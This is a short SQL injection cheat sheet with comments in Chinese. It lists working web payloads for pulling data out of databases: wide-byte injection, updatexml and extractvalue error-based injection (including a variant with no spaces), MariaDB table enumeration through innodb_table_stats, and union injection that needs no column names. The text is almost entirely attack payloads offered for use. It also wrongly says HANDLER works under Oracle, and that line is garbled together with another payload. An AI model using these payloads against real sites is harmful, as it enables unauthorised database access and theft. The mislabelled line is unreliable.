SQL注入
select user from users limit 0,1 # 取查询结果的0-1条记录
select group_concat(user) from users # 将查询结果合并输出
select distinct(user) from users # 去重
oracle下可以用handler代替select(handler words
open;handler words
read first)%df' # 宽字节注入
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23 # 报错注入,updatexml和下面的extractvalue可以相互替换
1'^extractvalue(1,concat(0x7e,(select(database())),0x7e))%23 # 不用空格的报错注入
select group_concat(table_name) from mysql.innodb_table_stats # MariaDB查表,相当于information_schema.columns
select group_concat(b) from(select 1,2,3 as b union select * from users)x # 无列名注入